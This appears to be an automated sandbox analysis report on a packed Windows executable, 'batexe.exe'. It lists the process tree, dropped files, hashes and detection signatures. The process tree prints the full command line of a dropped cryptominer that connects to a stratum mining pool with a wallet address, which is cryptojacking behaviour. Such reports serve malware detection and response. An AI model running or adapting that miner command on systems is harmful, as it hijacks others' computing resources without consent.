73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22-02-2024 02:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1516	b2e.exe
4636	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4636	cpuminer-sse2.exe
4636	cpuminer-sse2.exe
4636	cpuminer-sse2.exe
4636	cpuminer-sse2.exe
4636	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5068-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 1516	5068	batexe.exe	74
PID 5068 wrote to memory of 1516	5068	batexe.exe	74
PID 5068 wrote to memory of 1516	5068	batexe.exe	74
PID 1516 wrote to memory of 3480	1516	b2e.exe	75
PID 1516 wrote to memory of 3480	1516	b2e.exe	75
PID 1516 wrote to memory of 3480	1516	b2e.exe	75
PID 3480 wrote to memory of 4636	3480	cmd.exe	78
PID 3480 wrote to memory of 4636	3480	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5068
- C:\Users\Admin\AppData\Local\Temp\D36D.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D36D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D36D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D65B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D36D.tmp\b2e.exe

Filesize
2.4MB

MD5
ce4e4c77bca61567cbb9b9f5471fdadb

SHA1
cfaf06da7c6f31871073af85f266e0b778e22d30

SHA256
660144c1ecbc1d2d0c7ab32c4a77ea7d9389ce63e4109f29535be0e24a4305ba

SHA512
b22d031be598a66b9556fc097b81f618e74c9d7cbfc9eddf310b98cb0dfed5a8dc0fb0011710cc3d9d6d2240551421452d1ba85201877c601c29f10613b38fd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\D36D.tmp\b2e.exe

Filesize
2.4MB

MD5
c9c5a7c52482f302927662f6cdc64db0

SHA1
affbdbab1cea87081a4053b698ff79bed9ad8bf6

SHA256
4ea1e86f469c4ea3d9f2b515c3c8e8800502fb9d49524198216268354a0161a1

SHA512
1fbd2321e8ab3ed331e00e5ec2b1197913035067d495910238c8adc17becc8526431f88a5ac65d9bfddcf0e85d1a1ca8c2324c7844ec5c7ea19d1971b5ec5b97

Download Submit
C:\Users\Admin\AppData\Local\Temp\D65B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
313KB

MD5
c0d62f812593dc5146dce00cf761d5c5

SHA1
781e784a57a80c02d611236c8dd11b438f5a1722

SHA256
4299344bebcf75c8d6a0a06ae6ae547e6de421af9e16b7c6e6c8ce27ed871270

SHA512
b0ebcdfb5c41c1b2ecaefdd21f2122c27a48e57465013b3c391f2bf0871f912eb7af17c8d5a9161ad61ef5fe4326724bc6dbf2fa02748c0ab3eb8449bb1cfba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
217KB

MD5
f4ab33325bdaaabe6c5ba9fda3e6a1f2

SHA1
8771db743843dffa98461128e9a1625ddf6c9130

SHA256
50989a98f26727e48f81f854fc002e9a21d87ca90986633b13a2fab74d97ea4d

SHA512
b70c2385b3ea01ad50701455c99b9232aea55fc2339426edc2cbd5ece765fbd5f79cf348dd3136038c27ed816ad951250137d5885d188f706576f5b8f336197e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
182KB

MD5
836380236dc4cf4306ab50a56eff54ab

SHA1
a0aba759c58d049f234eac8b664ed8ff16d788b6

SHA256
7a9d1d1eaa132dadd1413ce0d0331830ebabb103807040596ac71c4b2b3fe84a

SHA512
98f1b1cc25816081ee868f8ed552aeb919a6d52a533b315d52acf1288eaedc851e75d019fed89cea267fee70b1f430cc4f2592e47d167d81c64293a795d18807

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
138KB

MD5
0f22a94644c92d66adcfac2245f0f554

SHA1
89133ade7ef2a66a0d7dd4817ddb99970c59bf83

SHA256
7e9f247d0b75d0fcab6501c626697e51fdb20f6c8e0f5124ed0c96e0640e49e4

SHA512
0fa03d13451a01cb2771b77a7952e4627826d33e789a5c07c126be0729489ca81de7765cd5456b93fa32ce52e8db1eca3c2e9217c11a407dc0377433dfbc6f51

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
220KB

MD5
2de2a60bf1ba521943a724eb5c344d8d

SHA1
88a9e68495667a29c38bb8d6a63989c1d77aeca5

SHA256
77bd137c21d97ed794f0d8274c5ce9aec357b7ed3bbc5f6ef1aebdc9d125286a

SHA512
bd7a52bf3a8db249e2bc970e58653f6cbc27e17b1b143230a2185996b31f2861926077bd5cc75d015983fb85591f2200b773964fbaae7cc9b65e84ed7a41562c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
199KB

MD5
63c9b4f21ec73506f9786eeb3fd0cea3

SHA1
e935999bc01475792574e9b935d194553cd82853

SHA256
35d540fe986f9ad2fffc8b299e04670520857eb77b432c3bde00e1c279704dbd

SHA512
64423d3b68e91fc8368216d5a6c6e849a905db34567c45da245e266d9d9e3581b28d982d52b1d7e0424f296b9f66ab99b4743c6e1fed83a2e292a3b720cf28fb

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
155KB

MD5
cea1cd8a2e63017fb9762bc0fc0d378d

SHA1
7400415730e4f107b452be5503e08543f7d7bed8

SHA256
69e591840d3e094dc8bc1070bf897e2e84ecd41103dadc320c82039a69884a36

SHA512
1b5a3a78f03f6854f1fe531d69924fd2a43bba16794869345b7f1e0ac7c25028edb157bfca6001540cb52b9e117ff0755a718168db802f7c4d612265f910fc58

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
238KB

MD5
1c5d161f9834962d1c7cd342e2130552

SHA1
cf8315f07c502c0761194f2373d63e636d3561b6

SHA256
0aa1b063cdf3570bf9c55332d2206f37d951bc1d203220c20f19dc159222ad7a

SHA512
e9e18db2a9e77ce440f121479254cad3eb0fb5782b3a0cf0b18afdb5414f0450422eafbcb2ad2dff8abf4f5fa07bba6dd9d2fe1f00e1804d0328b80fe12da9fd

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
152KB

MD5
6377fd4822478326289f065557076739

SHA1
1dee169f28fed51ddbb9f72849a7d85ce8b6721d

SHA256
88d69dc224398edbcbee5a53a86af2ba5129cdc943c3f3a251fdc8c7d9789257

SHA512
e748fe23dde80d01438992ef62ece89bf03f666f16f04a9238eb63a3ce8f7cca10de834faf92a0fd5b5e1bf012acbaf2cf1c2c42b6e3516cd0c9a908a2feeebf

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
181KB

MD5
f18cff92cfeac1156e717a2cbdc6e929

SHA1
30fea3867e1939462c4f12ee5644e047ee4efbac

SHA256
370bc3cad53e487793de2377e40897fd9f9f45999a2222fc6adfcd027b5bab06

SHA512
c7ca253f8db67323a3f46699752b5249fe9f459746f8db7c87346e51f53a889538d67207fb0e963a1ff79f7738eb62ad011b4665797cb43e1593531aeff377b8

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
157KB

MD5
7ca7ac6f92c92e0a61a0636fcd0dba05

SHA1
5e5a44dc70960e8d963eea960ded3b3198f301a7

SHA256
a13b49bd0b41ccf00302015c56092e31f2245a22426db1b753e6b7fb3d44afb3

SHA512
1d4c1f54f3bd28920ec7d29486fd828f5aa3d4ddca8f906773beaea51f59fd879619279d059e3ff37fc0535006c271984d3ee37afae19dc60506d2adac70ecd6

Download Submit
memory/1516-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1516-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4636-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4636-43-0x0000000069FA0000-0x000000006A038000-memory.dmp

Filesize
608KB

Download
memory/4636-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/4636-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4636-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4636-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5068-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download